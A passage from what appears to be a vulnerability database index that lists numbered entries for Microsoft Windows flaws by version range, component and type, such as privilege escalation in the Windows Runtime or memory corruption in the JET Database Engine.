20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172902] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172901] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172900] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172899] Microsoft Windows 8.1 up to Server 2019 Remote Procedure Call Runtime Remote unknown vulnerability [172898] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172896] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172895] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172894] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [172892] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172891] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172890] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172889] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172888] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172887] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172886] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172885] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172880] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP Driver denial of service [172877] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP information disclosure [172875] Microsoft Windows 8.1 up to Server 2019 Hyper-V unknown vulnerability [172874] Microsoft Windows 7 SP1 up to Server 2019 Network File System unknown vulnerability [171012] Microsoft Windows 10 20H2 up to Server 2019 NAT denial of service [171009] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V unknown vulnerability [171000] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170999] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170998] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170997] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [170996] Microsoft Windows Server 20H2 up to Server 2019 DNS Server code injection [170995] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170994] Microsoft Windows Server 20H2 up to Server 2019 DNS Server denial of service [170990] Microsoft Windows Admin Center unknown vulnerability [170981] Microsoft Windows 7 SP1 up to Server 2019 Remote Access API privileges management [170979] Microsoft Windows 10 20H2 up to Server 2019 OpenType Font Parser code injection [170978] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [170907] Microsoft Windows 10 20H2 up to Server 2019 Application Virtualization code injection [170436] Microsoft Windows 8.1 up to Server 2019 Extended Protection for Authentication improper authentication [169530] Microsoft Windows 7 SP1 up to Server 2019 Trust Verification API denial of service [169529] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169528] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP unknown vulnerability [169527] Microsoft Windows 7 SP1 up to Server 2019 TCP/IP denial of service [169526] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call information disclosure [169525] Microsoft Windows 7 SP1 up to Server 2019 Local Spooler unknown vulnerability [169524] Microsoft Windows 10 20H2 up to Server 2019 Microsoft.PowerShell.Utility Module protection mechanism [169521] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Network File System denial of service [169509] Microsoft Windows 7 SP1 up to Server 2019 Address Book unknown vulnerability [169502] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169501] Microsoft Windows 7 SP1 up to Server 2019 Fax Service unknown vulnerability [169499] Microsoft Windows Server 20H2 up to Server 2019 DNS Server unknown vulnerability [169498] Microsoft Windows 10 up to Server 2019 unknown vulnerability [169497] Microsoft Windows 10 Version 1809 for 32-bit Systems Codecs Library unknown vulnerability [169487] Microsoft Windows 10 up to Server 2019 Graphics unknown vulnerability [167703] Microsoft Windows 7 SP1 up to Server 2019 Update Stack privileges management [167700] Microsoft Windows 10 up to Server 2019 RDP authorization [167699] Microsoft Windows 7 SP1 up to Server 2019 RDP Core unknown vulnerability [167687] Microsoft Windows 7 SP1 up to Server 2019 Graphics information disclosure [167686] Microsoft Windows 7 SP1 up to Server 2019 GDI+ information disclosure [167685] Microsoft Windows 7 SP1 up to Server 2019 Fax Compose Form privileges management [167680] Microsoft Windows 7 SP1 up to Server 2019 CryptoAPI denial of service [167664] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167663] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167662] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167661] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167660] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167659] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167658] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167657] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167656] Microsoft Windows 7 SP1 up to Server 2019 RPC Runtime unknown vulnerability [167655] Microsoft Windows 8.1 up to Server 2019 NTLM unknown vulnerability [167651] Microsoft Windows 7 SP1 up to Server 2019 Media Foundation unknown vulnerability [167638] Microsoft Windows 7 SP1 up to Server 2019 DTV-DVD Video Decoder unknown vulnerability [167637] Microsoft Windows 8.1/10/10 1607/Server 2012 R2/Server 2016 Hyper-V denial of service [167636] Microsoft Windows 10 20H2 up to Server 2004 Hyper-V denial of service [167633] Microsoft Windows 7 SP1 up to Server 2019 GDI+ unknown vulnerability [160963] Microsoft Windows up to Server 2019 Projected Filesystem privilege escalation [160951] Microsoft Windows up to Server 2019 Kernel memory corruption [160950] Microsoft OneDrive on Windows privilege escalation [160949] Microsoft OneDrive on Windows privilege escalation [160948] Microsoft OneDrive on Windows privilege escalation [160947] Microsoft Windows up to Server 2019 UPnP Service privilege escalation [160946] Microsoft Windows up to Server 2019 TLS weak encryption [160944] Microsoft Windows up to Server 2019 Kernel Improper Initialization [160943] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [160942] Microsoft Windows up to Server 2019 Kernel information disclosure [160940] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160939] Microsoft Windows up to Server 2004 InstallService privilege escalation [160936] Microsoft Windows up to Server 2019 Microsoft COM for Windows privilege escalation [160932] Microsoft Windows up to Server 2019 CloudExperienceHost privilege escalation [160930] Microsoft Windows up to Server 2019 fdSSDP.dll privilege escalation [160925] Microsoft Windows up to Server 2019 DirectX privilege escalation [160924] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160923] Microsoft Windows up to Server 2019 GDI information disclosure [160922] Microsoft Windows up to Server 2019 Win32k information disclosure [160921] Microsoft Windows up to Server 2019 Win32k privilege escalation [160920] Microsoft Windows up to Server 2019 DNS denial of service [160912] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [160911] Microsoft Windows up to Server 2004 StartTileData.dll privilege escalation [160910] Microsoft Windows up to Server 2019 Win32k.sys privilege escalation [160909] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160908] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160907] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [160906] Microsoft Windows up to Server 2019 Language Pack Installer privilege escalation [160905] Microsoft Windows up to Server 2004 StartTileData.dll information disclosure [160904] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [160903] Microsoft Windows 10 2004 Shell Infrastructure privilege escalation [160902] Microsoft Windows up to Server 2019 GDI Dynamically-Managed Code Resources [160901] Microsoft Windows up to Server 2019 Graphics Component Dynamically-Managed Code Resources [160900] Microsoft Windows up to Server 2019 Graphics Component memory corruption [160899] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160898] Microsoft Windows up to Server 2019 DirectX privilege escalation [160895] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [160894] Microsoft Windows up to Server 2019 Routing Utilities denial of service [160892] Microsoft Windows up to Server 2019 Kernel information disclosure [160891] Microsoft Windows up to Server 2019 DHCP Server information disclosure [160890] Microsoft Windows up to Server 2019 Print Spooler privilege escalation [160889] Microsoft Windows up to Server 2019 Group Policy privilege escalation [160886] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [160883] Microsoft Windows up to Server 2019 Kernel information disclosure [160882] Microsoft Windows up to Server 2019 Graphics Component information disclosure [160881] Microsoft Windows up to Server 2019 State Repository Service information disclosure [160880] Microsoft Windows up to Server 2019 Function Discovery SSDP Provider privilege escalation [160879] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [160876] Microsoft Windows up to Server 2019 Storage Services privilege escalation [160874] Microsoft Windows up to Server 2019 Shell Infrastructure memory corruption [160873] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160871] Microsoft Windows up to Server 2019 NTFS privilege escalation [160870] Microsoft Windows up to Server 2019 Active Directory Federation Service 2FA weak authentication [160869] Microsoft Windows up to Server 2019 DNS privilege escalation [160868] Microsoft Windows 10 2004/Server 2004 Projected Filesystem privilege escalation [160866] Microsoft Windows up to Server 2019 Cryptographic Catalog Service privilege escalation [160865] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [160864] Microsoft Windows up to Server 2019 Active Directory integrated DNS privilege escalation [160863] Microsoft Windows up to Server 2019 Active Directory integrated DNS memory corruption [160862] Microsoft Windows up to Server 2019 Active Directory integrated DNS information disclosure [160861] Microsoft Windows up to Server 2019 RSoP Service Application privilege escalation [160855] Microsoft Windows up to Server 2019 Media Audio Decoder memory corruption [160853] Microsoft Windows up to Server 2019 Media Audio Decoder privilege escalation [160849] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160848] Microsoft Windows up to Server 2019 GDI+ memory corruption [160847] Microsoft Windows up to Server 2019 memory corruption [160843] Microsoft Windows up to Server 2019 Codecs Library memory corruption [160841] Microsoft Windows up to Server 2019 Camera Codec Pack memory corruption [160840] Microsoft Windows up to Server 2019 Microsoft COM for Windows memory corruption [160839] Microsoft Windows up to Server 2019 Text Service Module memory corruption [159610] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159608] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159604] Microsoft Windows up to Server 2019 Storage Service privilege escalation [159601] Microsoft Windows up to Server 2019 Speech Shell privilege escalation [159600] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [159597] Microsoft Windows up to Server 2019 File Server Resource Management Service privilege escalation [159595] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159594] Microsoft Windows up to Server 2019 Windows Runtime memory corruption [159593] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159592] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159591] Microsoft Windows up to Server 2019 Work Folder Service memory corruption [159590] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159589] Microsoft Windows up to Server 2019 State Repository Service information disclosure [159588] Microsoft Windows up to Server 2019 CDP User memory corruption [159587] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159585] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service privilege escalation [159584] Microsoft Windows up to Server 2019 WaasMedic Service information disclosure [159583] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159582] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [159581] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159580] Microsoft Windows Remote Desktop Gateway privilege escalation [159579] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159574] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159573] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159572] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159571] Microsoft Windows up to Server 2019 UPnP Device Host memory corruption [159570] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159568] Microsoft Windows up to Server 2019 CSC Service privilege escalation [159567] Microsoft Windows up to Server 2019 GDI memory corruption [159566] Microsoft Windows up to Server 2019 Remote Access memory corruption [159564] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [159563] Microsoft Windows up to Server 2019 Custom Protocol Engine memory corruption [159562] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159561] Microsoft Windows up to Server 2019 Kernel information disclosure [159560] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159558] Microsoft Windows up to Server 2019 Kernel privilege escalation [159557] Microsoft Windows up to Server 2019 Font Driver Host memory corruption [159556] Microsoft Windows up to Server 2019 Speech Runtime privilege escalation [159555] Microsoft Windows up to Server 2019 Backup Service privilege escalation [159554] Microsoft Windows up to RT 8.1 Backup Engine privilege escalation [159553] Microsoft Windows up to Server 2019 Telephony Server privilege escalation [159552] Microsoft Windows up to Server 2019 CDP User memory corruption [159550] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159548] Microsoft Windows up to Server 2019 Backup Engine privilege escalation [159545] Microsoft Windows up to Server 2019 GDI privilege escalation [159543] Microsoft Windows up to Server 2019 Kernel memory corruption [159542] Microsoft Windows up to Server 2019 Hard Link privilege escalation [159541] Microsoft Windows up to Server 2019 Remote Access memory corruption [159540] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159539] Microsoft Windows up to Server 2019 Radio Manager API memory corruption [159537] Microsoft Windows up to Server 2019 Accounts Control memory corruption [159534] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159531] Microsoft Windows up to Server 2019 Graphics Component memory corruption [159530] Microsoft Windows up to Server 2019 Media Foundation information disclosure [159529] Microsoft Windows up to Server 2019 Network Connection Broker privilege escalation [159528] Microsoft Windows up to Server 2019 Ancillary Function Driver for WinSock privilege escalation [159526] Microsoft Windows up to Server 2019 Public Account Pictures Folder privilege escalation [159524] Microsoft Windows up to Server 2019 Win32k information disclosure [159523] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159522] Microsoft Windows up to Server 2019 DirectWrite information disclosure [159521] Microsoft Windows up to Server 2019 SSDP Provider privilege escalation [159518] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [159517] Microsoft Windows up to Server 2019 Work Folders Service privilege escalation [159513] Microsoft Windows up to Server 2019 DirectX privilege escalation [159512] Microsoft Windows up to Server 2019 Kernel privilege escalation [159509] Microsoft Windows 10 1909/10 2004 Codecs Library memory corruption [159504] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159503] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159500] Microsoft Windows up to Server 2004 Codecs Library memory corruption [159499] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159497] Microsoft Windows up to Server 2019 Media Audio Codec memory corruption [159496] Microsoft Windows up to 10 2004 Codecs Library memory corruption [159495] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159494] Microsoft Windows up to Server 2019 Media Foundation memory corruption [159433] Microsoft Windows net use weak authentication [159426] Microsoft Windows VCF Card privilege escalation [159425] Microsoft Windows Group File privilege escalation [158019] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157995] Microsoft Windows up to Server 2019 WalletService information disclosure [157993] Microsoft Windows up to Server 2019 WalletService privilege escalation [157991] Microsoft Windows up to Server 2019 Update Stack privilege escalation [157990] Microsoft Windows up to Server 2019 Modules Installer privilege escalation [157989] Microsoft Windows up to Server 2019 Delivery Optimization Service privilege escalation [157988] Microsoft Windows 10 2004/Server 2004 Subsystem for Linux privilege escalation [157986] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157985] Microsoft Windows up to Server 2019 Profile Service privilege escalation [157984] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157983] Microsoft Windows up to Server 2019 Kernel privilege escalation [157981] Microsoft Windows up to Server 2019 Kernel information disclosure [157979] Microsoft Windows up to Server 2019 Resource Policy information disclosure [157978] Microsoft Windows up to Server 2019 Kernel information disclosure [157977] Microsoft Windows up to Server 2019 Kernel memory corruption [157975] Microsoft Windows up to Server 2019 ALPC privilege escalation [157973] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157972] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157971] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157970] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157969] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157968] Microsoft Windows 2012/2012 R2/2016/Server 2008 R2 SP1 Hyper-V RemoteFX vGPU privilege escalation [157963] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157960] Microsoft Windows up to Server 2019 Diagnostics Hub privilege escalation [157957] Microsoft Windows up to Server 2019 Push Notification Service privilege escalation [157956] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service information disclosure [157955] Microsoft Windows up to Server 2019 Agent Activation Runtime information disclosure [157952] Microsoft Windows up to Server 2019 USO Core Worker privilege escalation [157951] Microsoft Windows up to Server 2019 Storage Services privilege escalation [157950] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157949] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157948] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157946] Microsoft Windows up to Server 2019 lnk File privilege escalation [157945] Microsoft Windows up to Server 2019 Error Reporting information disclosure [157944] Microsoft Windows iSCSI Target Service privilege escalation [157943] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157942] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157941] Microsoft Windows up to Server 2019 Remote Desktop Client memory corruption [157939] Microsoft Windows up to Server 2019 Picker Platform privilege escalation [157938] Microsoft Windows up to Server 2019 CNG Key Isolation Service privilege escalation [157937] Microsoft Windows up to Server 2019 Windows Print Workflow Service privilege escalation [157936] Microsoft Windows up to Server 2019 Event Logging privilege escalation [157935] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157934] Microsoft Windows up to Server 2019 Local Security Authority Subsystem Service privilege escalation [157933] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157930] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157925] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [157924] Microsoft Windows up to Server 2019 UPnP Device Host privilege escalation [157923] Microsoft Windows up to Server 2019 Network Connections Service privilege escalation [157922] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [157921] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [157920] Microsoft Windows up to Server 2019 AppX Deployment Extension privilege escalation [157919] Microsoft Windows up to Server 2019 Mobile Device Management information disclosure [157918] Microsoft Windows up to Server 2019 ActiveX Installer Service privilege escalation [157916] Microsoft Windows up to Server 2019 Windows Address Book privilege escalation [157913] Microsoft OneDrive on Windows privilege escalation [157895] Microsoft Windows Defender MpSigStub.exe privilege escalation [157894] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157893] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157892] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [157889] Microsoft Windows up to Server 2019 Imaging information disclosure [157888] Microsoft Windows up to Server 2019 Graphics Origin Validation Error [157887] Microsoft Windows up to Server 2019 DirectWrite memory corruption [157886] Microsoft Windows up to Server 2019 Graphics Component memory corruption [157885] Microsoft Windows up to Server 2019 GDI+ memory corruption [157884] Microsoft Windows up to Server 2019 Font Library privilege escalation [157883] Microsoft Windows up to Server 2019 Graphics Component information disclosure [157882] Microsoft Windows up to Server 2019 GDI information disclosure [157881] Microsoft Windows up to Server 2004 Font Driver Host memory corruption [157509] Microsoft Windows up to Server 2019 Codecs Library memory corruption [157508] Microsoft Windows up to Server 2019 Codecs Library memory corruption [156422] Microsoft Windows 10 2004/Server 2004 SMBv3 denial of service [156421] Microsoft Windows up to Server 2004 SMBv3 information disclosure [156420] Microsoft Windows up to Server 2019 Windows Shell privilege escalation [156419] Microsoft Windows up to Server 2019 LNK privilege escalation [156418] Microsoft Windows up to Server 2019 CAB File privilege escalation [156417] Microsoft Windows up to Server 2019 OLE Automation privilege escalation [156415] Microsoft Windows up to Server 2019 Media Foundation information disclosure [156414] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156413] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156412] Microsoft Windows up to Server 2019 Media Foundation memory corruption [156410] Microsoft Windows up to Server 2004 Windows Runtime privilege escalation [156409] Microsoft Windows up to Server 2019 Kernel privilege escalation [156408] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156407] Microsoft Windows up to Server 2019 Kernel privilege escalation [156406] Microsoft Windows up to Server 2019 Kernel privilege escalation [156404] Microsoft Windows up to Server 2019 Kernel privilege escalation [156403] Microsoft Windows up to Server 2019 Kernel privilege escalation [156402] Microsoft Windows up to Server 2019 Win32k privilege escalation [156401] Microsoft Windows up to Server 2004 Kernel privilege escalation [156399] Microsoft Windows up to Server 2004 Kernel privilege escalation [156398] Microsoft Windows up to Server 2019 Win32k privilege escalation [156397] Microsoft Windows up to Server 2019 Kernel privilege escalation [156396] Microsoft Windows Windows Installer privilege escalation [156395] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156394] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156393] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156386] Microsoft Windows up to Server 2004 GDI+ memory corruption [156385] Microsoft Windows up to Server 2019 Windows Runtime information disclosure [156384] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156382] Microsoft Windows up to Server 2019 Connected Devices Platform Service privilege escalation [156381] Microsoft Windows up to Server 2004 Kernel privilege escalation [156380] Microsoft Windows up to Server 2019 Mobile Device Management privilege escalation [156378] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156377] Microsoft Windows up to Server 2019 Registry privilege escalation [156376] Microsoft Windows up to Server 2019 Error Reporting Manager privilege escalation [156375] Microsoft Windows up to Server 2019 Error Reporting privilege escalation [156374] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156373] Microsoft Windows up to Server 2019 Kernel privilege escalation [156372] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156371] Microsoft Windows up to Server 2019 Session Manager privilege escalation [156370] Microsoft Windows 10 2004/Server 2004 Connected User Experiences/Telemetry Service privilege escalation [156369] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156368] Microsoft Windows up to Server 2019 Backup Service privilege escalation [156367] Microsoft Windows up to Server 2019 Text Service Framework privilege escalation [156365] Microsoft Windows up to Server 2019 Connected User Experiences/Telemetry Service denial of service [156364] Microsoft Windows up to Server 2019 Group Policy privilege escalation [156363] Microsoft Windows up to Server 2019 OpenSSH privilege escalation [156361] Microsoft Windows up to Server 2019 Win32k information disclosure [156360] Microsoft Windows up to Server 2004 Windows Service information disclosure [156359] Microsoft Windows up to Server 2019 Host Guardian Service information disclosure [156358] Microsoft Windows up to Server 2019 Error Reporting information disclosure [156356] Microsoft Windows up to Server 2019 Background Intelligent Transfer Service privilege escalation [156354] Microsoft Windows up to Server 2019 Diagnostics/Feedback Settings App information disclosure [156353] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [156352] Microsoft Windows up to Server 2019 Windows Installer privilege escalation [156351] Microsoft Windows up to Server 2019 Store Runtime privilege escalation [156350] Microsoft Windows up to Server 2019 Kernel privilege escalation [156349] Microsoft Windows up to Server 2004 Update Orchestrator Service privilege escalation [156348] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [156347] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156346] Microsoft Windows up to Server 2019 Security Health Service privilege escalation [156321] Microsoft Windows Defender privilege escalation [156320] Microsoft Windows Defender privilege escalation [156319] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156318] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [156317] Microsoft Windows up to Server 2019 GDI privilege escalation [156316] Microsoft Windows up to Server 2019 Kernel privilege escalation [156315] Microsoft Windows up to Server 2019 GDI information disclosure [156314] Microsoft Windows up to Server 2019 Win32k privilege escalation [156313] Microsoft Windows up to Server 2019 GDI privilege escalation [156312] Microsoft Windows up to Server 2019 Graphics Component information disclosure [156311] Microsoft Windows up to Server 2019 Win32k privilege escalation [156310] Microsoft Windows up to Server 2019 DirectX privilege escalation [156309] Microsoft Windows up to Server 2019 Win32k privilege escalation [156303] Microsoft Windows 10 1709/10 1803/10 1809/10 1903/Server 2004 Feedback Hub privilege escalation [156302] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156301] Microsoft Windows up to Server 2019 Diagnostic Hub privilege escalation [156300] Microsoft Windows up to Server 2019 Diagnostics Hub Standard Collector privilege escalation [155176] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155175] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155174] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155173] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155172] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155171] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155170] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155169] Microsoft Windows up to Server 2019 State Repository Service privilege escalation [155168] Microsoft Windows up to Server 2019 GDI information disclosure [155167] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155166] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155165] Microsoft Windows up to Server 2019 JET Database Engine memory corruption [155162] Microsoft Windows Clipboard Service privilege escalation [155161] Microsoft Windows Clipboard Service privilege escalation [155160] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155158] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155157] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155156] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155155] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155154] Microsoft Windows up to Server 2019 Common Log File System Driver privilege escalation [155153] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155152] Microsoft Windows 7 SP1/Server 2008 R2 SP1 Media Foundation memory corruption [155151] Microsoft Windows up to Server 2019 Windows Runtime privilege escalation [155150] Microsoft Windows GDI 